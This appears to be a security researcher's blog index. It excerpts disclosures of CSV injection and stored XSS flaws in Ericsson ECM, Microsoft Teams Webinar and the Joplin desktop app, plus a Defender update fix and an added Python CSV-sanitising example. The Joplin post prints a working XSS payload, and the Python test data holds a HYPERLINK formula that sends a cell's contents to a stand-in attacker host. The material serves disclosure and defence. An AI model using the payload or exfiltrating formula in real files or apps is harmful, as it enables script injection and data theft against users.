Posts

Showing posts from 2021

Ericsson ECM (Enterprise Content Management) solution Vulnerable to CSV Injection (CVE-2021-41390)

Dear Reader, I was able to identify CSV Injection in the Ericsson ECM (Enterprise Content Management) solution, Version 18.0 (0331) R1E. CVE ID: CVE-2021-41390. Below are its details:
# Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with a simple user experience and enterprise product, service & resource catalog capabilities.
# Technical Details & Impact: It was observed that the Security Provider endpoint in the User Profile Management section is vulnerable to CSV Injection. Using CSV injection, maliciously crafted formulas can be used for three key attacks: hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524; hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website; and exfiltrating contents from the spreadsheet, or from other open spreadsheets.
# POC Lo...

Ericsson ECM (Enterprise Content Management) solution Vulnerable to Stored XSS (CVE-2021-41391)

Dear Reader, I was able to identify stored XSS in the Ericsson ECM (Enterprise Content Management) solution, Version 18.0 (0331) R1E. CVE ID: CVE-2021-41391. Below are its details:
# Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with a simple user experience and enterprise product, service & resource catalog capabilities.
# Technical Details & Impact: It was observed that the Security Management endpoint in the User Profile Management section is vulnerable to stored XSS. In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows full account takeover, or exploitation of admins' browsers using the BeEF framework.
# POC Log in as a normal user in ECM. Click on User Profile Management and then on Preference Definition, or just visit the URL "https://host:port/ecm/securityManagement" (change the host/port to your ECM host/...

Microsoft Teams Webinar Vulnerable to CSV Injection Vulnerability

Dear reader, while testing different features of Teams, I found a CSV injection vulnerability in the Teams Webinar feature: any external user or attacker can register to attend a public webinar and, on the webinar registration page, inject a malicious payload which is executed once the admin downloads the attendees list. As per Microsoft, they are not accepting it as a high/medium security bug (which I totally disagree with) and it is not eligible for a bounty or the hall of fame; they also gave permission to disclose this publicly. As per Microsoft, the admin has to click the Enable button once he opens the report. I mentioned to them multiple times that the admin will always trust the report, as it is coming from a trusted source, which in this case is Microsoft, and 95% of the time he will click the Enable button and the payload will be executed. Anyway, let's start with the vulnerability details. At the end of this document I will give a bonus trick on how to find publicly available ...
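Both the Ericsson ECM post and the Teams Webinar post above describe the same defect: user-controlled text lands unchanged in a CSV export that an administrator opens in a spreadsheet. The Python below is an added example written for this page, not code from either vendor or from the original posts. It shows an attendee export with a constructed attacker row (the HYPERLINK formula leaks the contents of cell A1 to an attacker-controlled host when clicked), then the OWASP-style mitigation of prefixing formula-looking cells with an apostrophe, and a reviewer-side check that re-parses the output to confirm no formula-triggering cell survived. The attendee data, host name and function names are all assumptions for illustration.

```python
import csv
import io
import re

# Leading characters that make Excel / LibreOffice evaluate a cell as a formula
# (the OWASP CSV injection list: '=', '+', '-', '@', tab and carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain signed numbers such as "-5" or "+3.25" are left untouched so that
# numeric columns in the export stay usable.
NUMERIC_RE = re.compile(r"^[+-]?\d+(\.\d+)?$")


def is_formula_like(value):
    """True if a spreadsheet would try to evaluate this cell as a formula."""
    return (
        isinstance(value, str)
        and value.startswith(FORMULA_TRIGGERS)
        and NUMERIC_RE.match(value) is None
    )


def neutralize_cell(value):
    """Prefix formula-looking text with an apostrophe so it is rendered as text.

    The apostrophe stays visible when the CSV is opened in a spreadsheet; that
    is the accepted trade-off of this mitigation. Quoting of the cell and
    doubling of embedded double quotes is left to the csv writer below.
    """
    if is_formula_like(value):
        return "'" + value
    return value


def export_attendees(rows, sanitize=True):
    """Render registration rows as CSV text, optionally neutralising formulas."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "email", "company"])
    for row in rows:
        writer.writerow([neutralize_cell(cell) if sanitize else cell for cell in row])
    return buf.getvalue()


def contains_formula_cell(csv_text):
    """Re-parse an export and report whether any cell is still formula-like."""
    reader = csv.reader(io.StringIO(csv_text))
    return any(is_formula_like(cell) for row in reader for cell in row)


# Constructed sample registrations (assumed data, not from either advisory).
# Row 2 is the attacker: the name field carries a HYPERLINK formula that sends
# the contents of cell A1 to attacker.invalid when clicked, and the company
# field is an arithmetic formula. Row 3 shows the false-positive problem: a
# phone number starts with '+' but is harmless, while "-5" is a real number.
ATTENDEES = [
    ("Alice Example", "alice@example.com", "Example Corp"),
    ('=HYPERLINK("http://attacker.invalid/?"&A1,"click me")', "mallory@example.net", "-2+3"),
    ("+49 30 1234567", "bob@example.org", "-5"),
]

if __name__ == "__main__":
    raw = export_attendees(ATTENDEES, sanitize=False)
    safe = export_attendees(ATTENDEES)
    print("raw export contains formula cells:", contains_formula_cell(raw))
    print(safe)
    print("sanitised export contains formula cells:", contains_formula_cell(safe))
```

Note that wrapping every cell in double quotes on its own does nothing here: spreadsheets strip the quotes and still evaluate `=HYPERLINK(...)`, which is why the export must change the cell content and not only its quoting.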

Windows Update / Defender update issue

Today, while updating Windows Defender to the latest version, I faced the issue below: it would not update to the latest version and showed error code 0x80070643. Multiple retries and troubleshooting were performed but nothing helped. Later I found the commands below, which update Defender from the command prompt:
    cd %ProgramFiles%\Windows Defender
    MpCmdRun.exe -removedefinitions -dynamicsignatures
    MpCmdRun.exe -SignatureUpdate
and it fixed the issue.
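The same two MpCmdRun.exe steps, wrapped in a PowerShell script that records the signature version before and after so you can confirm the update actually happened rather than just ran without error. This is an added example, not part of the original post; it assumes an elevated PowerShell session and a default Defender install path under $env:ProgramFiles.

```powershell
# Added example: re-run the MpCmdRun.exe fix and verify the signature version changed.
# Run from an elevated PowerShell prompt.
$mpcmd = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
if (-not (Test-Path $mpcmd)) { throw "MpCmdRun.exe not found at $mpcmd" }

$before = Get-MpComputerStatus
Write-Host ("Before: AV signature {0} (last updated {1})" -f `
    $before.AntivirusSignatureVersion, $before.AntivirusSignatureLastUpdated)

# Step 1: drop the dynamic signatures that a failed update can leave behind.
& $mpcmd -RemoveDefinitions -DynamicSignatures
if ($LASTEXITCODE -ne 0) { Write-Warning "RemoveDefinitions exited with $LASTEXITCODE" }

# Step 2: pull a fresh signature set.
& $mpcmd -SignatureUpdate
if ($LASTEXITCODE -ne 0) { Write-Warning "SignatureUpdate exited with $LASTEXITCODE" }

$after = Get-MpComputerStatus
Write-Host ("After:  AV signature {0} (last updated {1})" -f `
    $after.AntivirusSignatureVersion, $after.AntivirusSignatureLastUpdated)

# A successful run should move at least one of these two values.
if ($after.AntivirusSignatureVersion -eq $before.AntivirusSignatureVersion -and
    $after.AntivirusSignatureLastUpdated -eq $before.AntivirusSignatureLastUpdated) {
    Write-Warning 'Signature version did not change; check the Windows Defender operational event log for the update error.'
}
```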

Joplin App Desktop Version Vulnerable to XSS

Dear Reader, Jubair Rehman Yousafzai here. Update Sept 2022: CVE assigned, CVE-2021-33295 https://www.cvedetails.com/cve/CVE-2021-33295/ During testing of the Joplin desktop app, versions before 1.8.5, I was able to execute malicious XSS when the payload was entered in the main body of the Joplin desktop app. Once I clicked the Toggle button twice, the payload executed successfully. The payload I used for this testing is as below: <noscript><p title="</noscript><img src=x onerror=alert('testing')>"> Below is the POC for this exploit. After reporting to the Joplin team, they fixed the issue directly and released the fix in version 1.8.5. Below are their release notes and details: https://github.com/laurent22/joplin/releases/tag/v1.8.5 Thanks, Jubair Rehman: https://twitter.com/jubairfolder